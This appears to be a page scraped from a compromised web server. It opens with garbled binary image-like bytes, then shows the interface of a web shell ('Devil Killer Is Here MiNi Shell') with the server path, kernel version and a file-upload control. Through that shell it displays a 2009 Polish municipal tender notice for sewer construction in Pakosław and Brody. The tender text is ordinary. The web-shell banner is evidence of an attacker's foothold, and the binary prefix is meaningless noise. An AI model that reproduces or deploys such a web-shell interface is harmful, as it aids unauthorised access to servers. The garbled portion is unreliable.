JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/134234-N-2009.html

<p class="kh_header"><b>Lwówek: Budowa kanalizacji sanitarnej w Gminie Lwówek, miejscowości Pakosław Brody.</b><br>
<b>Numer ogłoszenia: 134234 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lwówek , ul. Ratuszowa 2, 64-310 Lwówek, woj. wielkopolskie, tel. 061 4414024, faks 061 4414212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lwowek.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej w Gminie Lwówek, miejscowości Pakosław Brody..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia określa dokumentacja projektowa - projekt budowlany, wykonany dla zadania pn.: Budowa kanalizacji sanitarnej w gminie Lwówek, miejscowości Pakosław i Brody, w podziale na część I i część II, przez Autorską Pracownię Inżynierii Sanitarnej APIS z Piły, dla którego Zamawiający otrzymał decyzję zatwierdzającą projekt budowlany i udzielającą pozwolenia na budowę wydaną przez Starostwo Powiatowe w Nowym Tomyślu, decyzja nr 514/2007 z dnia 05.10.2007r., oraz decyzja nr 32/2008 z dnia 21.01.2008r. projekt został przygotowany w szerszym zakresie, a niżeli przewidziany do realizacji w tym postępowaniu, (zał. nr 11 i nr 12 do siwz) a także: 
- projekt wykonawczy do tego zadania - zał. nr 13 do siwz,
- specyfikacja techniczna wykonania i odbioru robót ST.00.00 wymagania ogólne - zał. nr 14 i 15 do siwz,
- szczegółowe specyfikacje techniczne wykonania i odbioru robót, zał. nr 14 i 15 do siwz, a w tym; 
  ST.01.10 - roboty pomiarowe  
  ST.03.10 - roboty ziemne,
  ST.04.10 - sieć kanalizacji sanitarnej grawitacyjnej,
  ST.05.10 - sieć kanalizacji sanitarnej tłocznej,
  ST.06.10 - pompownie ścieków,   
- przedmiary robót branżowych do wykonania - zał. nr 16 do siwz (Zamawiający uznaje, że przedmiary mają jedynie znaczenie pomocnicze i stanowią podstawę informacyjną dla Wykonawcy).

2. Przedmiot zamówienia obejmuje zakres: 
1)  Wykonanie tłoczni PS5 wraz z jej zlewnią i kanałem tłocznym BRODY
- kanał graw. PCV d:200 - 1949,9mb;
- kolektor tłoczny PE 110 - 3458,80mb;
- studnie rewizyjne betonowe 1000mm - 76szt;
- przykanaliki PCV d:160 - 428,9mb;
- tłocznia ścieków PS5 - Qp=21,2m3/h; Hp=42,7mH2O; 
2) Wykonanie przepompowni PS8 wraz z jej zlewnią i kanałem tłocznym BRODY
- kanał grawitacyjny PCV d:200 - 279mb
- kolektor tłoczny PE 75 -19,2 mb
- kolektor tłoczny PE 90 - 104,5 mb
- studnie rewizyjne 1000mm - 13szt.
- przykanaliki PCV d:160 95,8mb;
- przepompownia ścieków PS8 - Qp=2,8m=dm3/s=10,1m3/h; Hp=11,0mH2O.
3)  Wykonanie przepompowni PS7 wraz z jej zlewnią i kanałem tłocznym PAKOSŁAW
- kanał grawitacyjny PCV d:200 -362mb;
- kolektor tłoczny PE 75 - 237,5 mb;
- studnie rewizyjne 1000mm - 15szt.
- przykanaliki PCV d:160 - 94,1mb;
- przepompownia ścieków PS7 -Qp=2,8dm3/s=10,1m3/h, Hp=11mH2O.
4)  Wykonanie tłoczni PS6 (z opomiarowaniem wewnątrz tłoczni) wraz z jej zlewnią i kanałem tłocznym PAKOSŁAW
- kanał grawitacyjny PCV d:200 - 1659,7;
- kolektor tłoczny PE 125 - 2818,60 mb
- studnie rewizyjne 1000mm - 64szt.
- przykanaliki PCV d:160 -457,5mb 
- tłocznia ścieków PS6 -Qp= 26,5m3/h, Hp= 38,6mH2O.

Zakres przedmiotu zamówienia obejmuje wykonanie sieci kanalizacyjnych do granic działek i zaślepienie rur korkiem.

Wyposażenie tłoczni i przepompowni w sterowniki do przesyłania danych (przesyłanie wiadomości SMS oraz obustronna transmisja danych, oprogramowanie diagnostyczne służące do przesyłania komunikatów o stanach awaryjnych i przedawaryjnych).

Różnice w długościach pomiędzy projektem, a przedmiarem robót wynikają z faktu, iż w projekcie zaznaczono poszczególne odcinki pomiędzy środkami studni rewizyjnych, a w przedmiarze podano odległości od zewnętrznych obrysów studni rewizyjnych (dotyczy zarówno kanałów grawitacyjnych jak i przykanalików). 
  
W zakres prac wchodzi wykonanie wszelkich robót przygotowawczych i tymczasowych: m.in. roboty pomiarowe i towarzyszące, zajęcie pasa drogowego dróg gminnych i powiatowych, w pasie których będzie realizowana inwestycja, organizacja ruchu, roboty ziemne, odwodnienie wykopów, zabezpieczenie przeszkód napotkanych w wykopach itp.

Wymagany termin wykonania zamówienia - część I - do 5 m-cy od daty podpisania umowy, obejmuje wieś Pakosław, a w tym:
- kanał tłoczny od PS-6 do połączenia z ist. kanalizacją w kierunku Lwówka (PE 125 - dł. 2818,6m)
- tłocznię ścieków PS-6;
- kanały grawitacyjne w miejscowości Pakosław biegnące równolegle z kanałem tłocznym, oraz kanały grawitacyjne stanowiące odcinek tranzytowy ścieków z miejscowości Brody do miejscowości Pakosław tzn. odcinki od PS-6 poprzez (S-1) do S-35; odcinek od SR-2 do S-31, odcinek od S-32 poprzez S-70 do S-75, odcinek od S-3 poprzez S-40 do SR-7, od S-4 poprzez S-50 do S-63, wraz z przykanalikami dochodzącymi do ww kanałów grawitacyjnych, 	 
oraz wieś Brody, a w tym:
-  odcinek tłoczny od tłoczni PS-5 Brody do studni rozprężnej SR-2 w
Pakosławiu         
- tłocznia ścieków PS-5 w Brodach 
- kanały grawitacyjne w miejscowości Brody biegnące równolegle z kanałem tłocznym, tzn. odcinki od PS-5 poprzez (S-1) do S-25; odcinek od S-25 poprzez S-30 do S-33, odcinek od S-1 do S-4.1 wraz z przykanalikami dochodzącymi do ww kanałów grawitacyjnych. 
	 
Wymagany termin wykonania zamówienia - część II - do 12 m-cy od daty podpisania umowy, obejmuje pozostały zakres przedmiotu zamówienia nie ujęty w części I, tzn. wieś Pakosław, a w tym:
- odcinek tłoczny od pompowni PS-7 do studni rozprężnej SR-7,
- przepompownia ścieków PS-7,
- odcinek grawitacyjny od PS-7 poprzez S-80 do S-88 oraz odcinek grawitacyjny od S-80 poprzez S-90 do S-95 wraz z przykanalikami dochodzącymi do ww kanałów grawitacyjnych,
oraz wieś Brody, a w tym: 
- odcinek tłoczny od PS-8 poprzez węzeł T-150 do studni rozprężnej SR-4,
- przepompownie ścieków PS-8,
- kanały grawitacyjne zlewni PS-8 od S-64 do S-70 oraz od PS-8 do S-71 oraz od S-67 poprzez S-71 do S-75, 
- kanały grawitacyjne zlewni PS-5  od S-25 do S-29 oraz od S-18 poprzez S-34 do S-38, od S-10 poprzez S-39 do S-41, od S-7 poprzez S-50 do S-59 oraz od S_7 poprzez S-60 do SR-4, oraz od S-2 poprzez S-84 do S-89 oraz od S-84 poprzez S-90 do S-92 oraz od S-90 poprzez S-93 do S-99 

3. Uwagi: 
1) wykonanie poszczególnych zakresów z części I i II obejmuje kompleksowe wykonanie tych części i wszystkich związanych z nimi robót, sukcesywnie i na bieżąco, po dokonanych odbiorach robót ulegających zakryciu, przeprowadzeniu sprawdzeń i prób należy dla danych odcinków  wykonać wszystkie roboty odtworzeniowe i porządkowe. 

2) Zamawiający na sfinansowanie przedsięwzięcia przeznacza :
- środki pochodzące z budżetu gminy Lwówek, oraz
- zamierza zawrzeć z Wojewódzkim Funduszem Ochrony Środowiska i Gospodarki Wodnej w Poznaniu (WFOŚiGW) umowę pożyczki na dofinansowanie przedmiotu umowy, a także
- zamierza uzyskać dofinansowanie z Programu Regionalnego Narodowa Strategia Spójności, Priorytet III. Środowisko przyrodnicze. Działanie  3.4. Gospodarka wodno - ściekowa, w ramach Wielkopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013

W związku z zamierzeniami Zamawiającego wymienionymi wyżej,  zastrzega on sobie możliwość dokonania w każdym czasie zmian harmonogramu rzeczowo - finansowego - zał. nr 8 do siwz, o którym mowa § 2 postanowień umowy (projekt umowy - zał. nr 3 do siwz), w trakcie realizacji zamówienia i wprowadzenie w jego miejsce harmonogramu, który będzie stanowił załącznik do umowy pożyczki, lub dofinansowania w ramach Wielkopolskiego Regionalnego Programu Operacyjnego. Jeżeli zaistnieje taka okoliczność, Wykonawca będzie zobowiązany do realizacji zamówienia zgodnie ze zmienionym harmonogramem.

3) Jeżeli w dokumentacji projektowej lub w specyfikacjach technicznych wykonania i odbioru robót zostały przedstawione wskazania techniczne lub materiały z podaniem producenta, należy traktować jako przykładowe, ze względu na zasady ustawy Prawo zamówień publicznych art. 29. Oznacza to, że Wykonawcy mogą zaproponować inne rozwiązania, z zachowaniem odpowiednich, równoważnych, tj. nie gorszych niż wskazane w dokumentacji projektowej i specyfikacjach technicznych wykonania i odbioru robót, parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem projektu, z zapewnieniem uzyskania przez Wykonawcę i na jego koszt wszelkich ewentualnych uzgodnień, w tym także, w razie potrzeby autora dokumentacji projektowej i specyfikacji technicznych wykonania i odbioru robót.

4) Zamawiający obliguje Wykonawcę do zastosowania przy budowie poszczególnych elementów składowych systemu (rurociągi, przepompownie, tłocznie, osprzęt) w jednakowej technologii i jednego typu i jednego producenta (np.: jeżeli Wykonawca dokonał wyboru jednego materiału na rurociągi to musi zachować ten materiał w całym budowanym systemie; jeżeli dokonał wyboru pomp do przepompowni czy tłoczni jednego producenta, to musi zachować je we wszystkich budowanych przepompowniach czy tłoczniach; jeżeli dokonał wyboru osprzętu elektrycznego np.: styczniki  jednego producenta, to musi je zachować we wszystkich przypadkach przy tej budowie).

5) zamawiający zastrzega sobie prawo zmniejszenia zakresu robót z przedmiotu zamówienia do wysokości środków zabezpieczonych na to zadanie w budżecie gminy Lwówek na 2009r. (jeżeli zajdzie taka potrzeba).

4. Inne wymagania odnoszące się do przedmiotu zamówienia:       
1) geodezyjne wytyczenie trasy rurociągu kanalizacyjnego, 
2) obsługa archeologiczna inwestycji w razie takiej potrzeby, 
3) włączenie w istniejącą sieć kanalizacyjną, 
4) wykonanie przejść pod przeszkodami, 
5) odwodnienie wykopów w przypadku takiej potrzeby, 
6) odtworzenie nawierzchni chodników, dróg asfaltowych i innych nawierzchni utwardzonych i nieutwardzonych, 
7) wykonanie prób szczelności rurociągów kanalizacyjnych obowiązkowo przy udziale przyszłego użytkownika, którym będzie Zakład Gospodarki Komunalnej w Lwówku, ul. Powst. Wielkopolskich 40, 64-310 Lwówek, 
8) wykonanie powykonawczej inwentaryzacji geodezyjnej - 3szt., z wyszczególnieniem odcinków w pasach dróg gminnych i pasach dróg powiatowych, 9) zainstalowanie oznakowania odpowiedniego do przebiegu trasy sieci rurociągu kanalizacji sanitarnej, 
10) pokrycie kosztów zajęcia pasa drogi i zmianą organizacji ruchu na czas budowy w pasach dróg gminnych i powiatowych.
11) przygotowanie wniosków do odpowiedniego zarządcy drogi po wykonanych robotach, na umieszczenie urządzeń nie związanych z ruchem i gospodarką drogową w pasie drogi,
12) przedmiot zamówienia należy wykonać zgodnie ze sztuka budowlaną i zasadami współczesnej wiedzy technicznej, przy przestrzeganiu Polskich Norm, polskich aprobat technicznych i polskich specyfikacji technicznych oraz przepisów  bhp.
Wszystkie materiały i urządzenia użyte do wykonania przedmiotowej modernizacji oraz ich parametry jakościowo techniczne muszą odpowiadać parametrom wytyczonym przez Wspólnotę (Unię Europejską), muszą posiadać atesty lub certyfikaty akceptowalne przez Unię i muszą pochodzić z Uni, bądź z jednego z krajów stowarzyszonych w ramach Unii (z uwzględnieniem prawa opcji obejmującego ewentualne zamienniki wskazane przez wykonawcę projektu technicznego w opisie technicznym, dokumentacji projektowej bądź zaproponowane przez Wykonawcę po akceptacji projektanta). 
13) na czas prowadzenia robót Wykonawca ustawi odpowiednie znaki ostrzegawcze oraz zapewni właściwe zabezpieczenie i oświetlenie terenu budowy, a po zakończeniu robót teren przywróci do stanu pierwotnego.
14) wykonawca przystępujący do postępowania jest zobowiązany do zaakceptowania w formie pisemnego oświadczenia, że akceptuje projekt umowy, przez jego wypełnienie i parafowanie każdej ze stron. 
15) wykonawca przystępujący do postępowania musi obligatoryjne zapoznać się z terenem w którym wykonywany będzie przedmiot zamówienia. 
 
5. Wymagania organizacyjne
1) Uzyskanie wymaganych prawem pozwoleń i uzgodnień łącznie z przyjęciem przez właściwy organ nadzoru budowlanego obiektu do użytkowania z uzyskaniem decyzji pozwolenia na użytkowanie pn. Budowa kanalizacji sanitarnej w gminie Lwówek, miejscowości Pakosław Brody, dla cześci I i części II. 
2) Przygotowanie organizacyjne przedsięwzięcia pod kątem najmniejszej uciążliwości dla społeczeństwa z pokryciem ewentualnych roszczeń odszkodowawczych właścicieli nieruchomości, przez które prowadzić będzie rurociąg kanalizacyjny i przykanaliki. 
3) Pokrycie ewentualnych kosztów napraw uszkodzonych urządzeń, wyrządzonych szkód oraz doprowadzenie do stanu wymaganego przez administratora przeszkód na trasie budowy rurociągu kanalizacyjnego i przykanalików.
4) Pokrycie kosztów związanych z zajęciem pasa drogowego, z nadzorem archeologicznym w przypadku jego potrzeby oraz innymi wymaganymi przy przejściach przez przeszkody występujące na trasie budowy rurociągu kanalizacyjnego i przykanalików (podkłady geodezyjne na których została sporządzona dokumentacja projektowa mogą nie zawierać wszystkich informacji i szczegółów o terenie oraz wbudowanej infrastrukturze). 
5) Wykonawca przedstawi Zamawiającemu po dokonaniu odbioru końcowego robót kartę gwarancyjną której wzór stanowi - zał. nr 10 do siwz , w której zawrze deklarację na czas 24 godzinnej reakcji serwisu naprawczego w okresie gwarancyjnym w przypadku wystąpienia awarii, w czasie nie dłuższym niż 5 godzin od momentu powiadomienia go o zaistniałej awarii do momentu rozpoczęcia napraw w miejscu awarii.                                                                                                                                  6) Wymagania dotyczące gwarancji
Wykonawca udzieli co najmniej 36 miesięcznej gwarancji na wykonane przez siebie roboty obejmującej wszystkie etapy z dokumentacji technicznej, oraz przekaże dokumenty gwarancyjne producentów wbudowanych przez siebie urządzeń technicznych, i zainstalowanego osprzętu.
6. Zamawiający nie dopuszcza do składania ofert częściowych, przedmiot zamówienia obejmuje część I i część II razem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.10.00.00-8, 45.23.32.20-7, 45.11.12.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  50.000,00zł (słownie: pięćdziesiąt tysięcy złotych 00/100).
Szczegółowe zasady wnoszenia wadium określa rozdział VIII siwz do tego zadania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienie mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:                                                                                                                                                                                      
1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.                                                                                                                                                              Warunek spełnią wykonawcy, którzy :
1) prowadzą działalność gospodarczą w rozumieniu ustawy z dnia 2 lipca 2004 roku o swobodzie działalności gospodarczej (Dz. U.04.173.1807), odpowiadającą swoim charakterem przedmiotowemu zamówieniu,
2) i posiadają dokumenty potwierdzające posiadanie uprawnień - pełnomocnictw dla osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.                          

2. Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
Warunek spełnią wykonawcy, którzy : 
1) dysponują minimum jedną osobą (kierownikiem budowy) posiadającym uprawnienia budowlane w zakresie i specjalności objętej zamówieniem (budowy sieci kanalizacji sanitarnej, instalacji elektrycznych i budowy dróg)  - odpowiedzialnych za realizację robót, może to być jedna osoba, lub trzy niezależne o odpowiednich uprawnieniach), o których mowa w art. 14 ust. 1 pkt 4 ustawy z dnia 7 lipca 1994 roku - Prawo budowlane Dz. U. z 2006 roku, Nr 156, poz. 1118, z późn. zm., dysponujący aktualnym potwierdzeniem  przynależności do Okręgowej Izby Inżynierów Budownictwa, 
bądź przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego (kierownika budowy), osób zdolnych i odpowiedzialnych, przewidzianych do wykonania przedmiotowego zamówienia. 
2) w okresie ostatnich pięciu lat przed wszczęciem postępowania (a jeżeli okres działalności jest krótszy - to w tym okresie) wykonali należycie minimum dwie roboty budowlane odpowiadające swoim rodzajem i zakresem robotom stanowiącym przedmiot zamówienia o wartości co najmniej 2.000.000,00zł każda i posiadają dokumenty potwierdzające, że roboty te zostały wykonane należycie, 
3) wykażą się niezbędnymi do wykonania zamówienia narzędziami i urządzeniami i przedstawią formę władania nimi,
4) wykażą że dysponują osobami zdolnymi do wykonania przedmiotowego zamówienia, bądź przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz dołączą wykaz podwykonawców przewidzianych do wykonania przedmiotowego zamówienia z określeniem rodzaju powierzonej części zamówienia do 
wykonania, wartości powierzonej części zamówienia i udziału procentowego w zakresie realizacji przedsięwzięcia - zał. nr 9 do siwz,   

3. Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Warunek spełnią wykonawcy, którzy
:
1) posiadają na realizację przedmiotowego zamówienia środki finansowe lub zdolność kredytową w wysokości minimum 1.000.000,00zł
2) posiadają i przedstawią aktualną polisę ubezpieczeniową potwierdzającą że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 200.000,00zł od jednego zdarzenia (zdarzenia wymieniono w § 3 ust. 7 pkt 1) ppkt. 1/, 2/, 3/ - projektu umowy).
3) udzielą zamawiającemu zgody na wydłużony okres płatności dla poszczególnych części wynikających z harmonogramu rzeczowo - finansowego w fakturach częściowych za zadanie (zakres rzeczowy wg rodzaju robót do wykonania) do 30 dni po pozytywnym dokonaniu odbioru częściowego poszczególnych części oraz końcowego robót, co wykażą w akceptacji projektu umowy - zał. nr 3 do siwz.                                                                                                                                                             4) przyjmą oświadczenie Zamawiającego, że nie udziela on zaliczek na poczet wykonania przedmiotu zamówienia.     
                                                                                                                                                                          4. Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.  
Warunek spełnią wykonawcy, którzy : 
1) załączą oświadczenie o spełnieniu warunków udziału w postępowaniu i załączą dokumenty, potwierdzające spełnienie warunków udziału w postępowaniu. 

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego
spełnia/niespełna i będzie polegała na formalnym sprawdzeniu czy w przedstawionych przez wykonawcę dokumentach znajdują się informacje i oświadczenia potwierdzające spełnienie tych warunków..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty
i załączniki;                                                                                                                                                                                                                                                                                                               A.1) Dowód wniesienia
wadium,                                                                                                         A.2) Formularz cenowy - OFERTA, wypełniony i podpisany przez wykonawcę - zał. nr 1 do siwz, w załączeniu kosztorys ofertowy - kalkulacja kosztorysowa zadania w oparciu o metodę uproszczoną, polegającą na kalkulacji w oparciu o ceny jednostkowe robót, uwaga; ponieważ obowiązuje wynagrodzenie  ryczałtowe, kosztorys ofertowy nie będzie miał zastosowania na etapie oceny ofert.
A.3) Wypełniona tabela czynników cenotwórczych - zał. nr 4 do siwz, - podstawa dla ewentualnych robót dodatkowych, 
A.4) Wypełniony harmonogram rzeczowo - finansowy w zakresie realizacji przedsięwzięcia/inwestycji - zał. nr 8 do siwz, 
A.5) Oświadczenie o zapoznaniem się z terenem w którym będzie wykonywane zadanie i uzyskaniu wszystkich niezbędnych informacji mogących mieć wpływ na sporządzenie oferty oraz jej cenę, 
  
B.6) Aktualny dokument rejestracji, potwierdzający prowadzenie działalności gospodarczej w zakresie objętym zamówieniem,
B.7) Dokumenty potwierdzające posiadanie uprawnień - pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych, w przypadku udzielenia pełnomocnictwa do podpisania oferty wraz z załącznikami osobie innej niż upoważniona do reprezentacji - dokument pełnomocnictwa, 
B.8) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,
B.9) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy,
B.10) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9,
B.11) Oświadczenie o spełnieniu warunków udziału w postępowaniu, określone w art. 22 ustawy - Prawo zamówień publicznych - zał. nr 2 do siwz,

C.12) Wykazanie w ciągu ostatnich pięciu lat, minimum dwóch zamówień odpowiadających swoim rodzajem, zakresem i wartością robotom budowlanym stanowiącym przedmiot zamówienia o wartości co najmniej 2.000.000,00zł każda, (wykaz robót  budowlanych sporządzony przez Wykonawcę z podaniem wartości zamówień, dat wykonania, nazwy i adresu oraz tel. zamawiającego dla, którego Wykonawca wykonał zamówienie, z dołączonym potwierdzeniem należytego wykonania zamówienia - referencje  - zał. nr 5 - do siwz.
C.13) wykaz niezbędnego sprzętu narzędzi i urządzeń przewidzianych do wykonania zamówienia - zał. nr 7 do siwz,
C.14) Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - zał. nr 6 (str. 1 +2) do siwz, oraz                                                                                                                                           pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, które nie są jego pracownikami, a którymi będzie dysponował do wykonania przedmiotowego zamówienia.  
C.15) Wykaz podwykonawców przewidzianych do wykonania przedmiotowego zamówienia z określeniem rodzaju powierzonej części zamówienia do wykonania, wartości powierzonej części zamówienia i udziału procentowego w zakresie realizacji przedsięwzięcia - zał. nr 9 do siwz, 
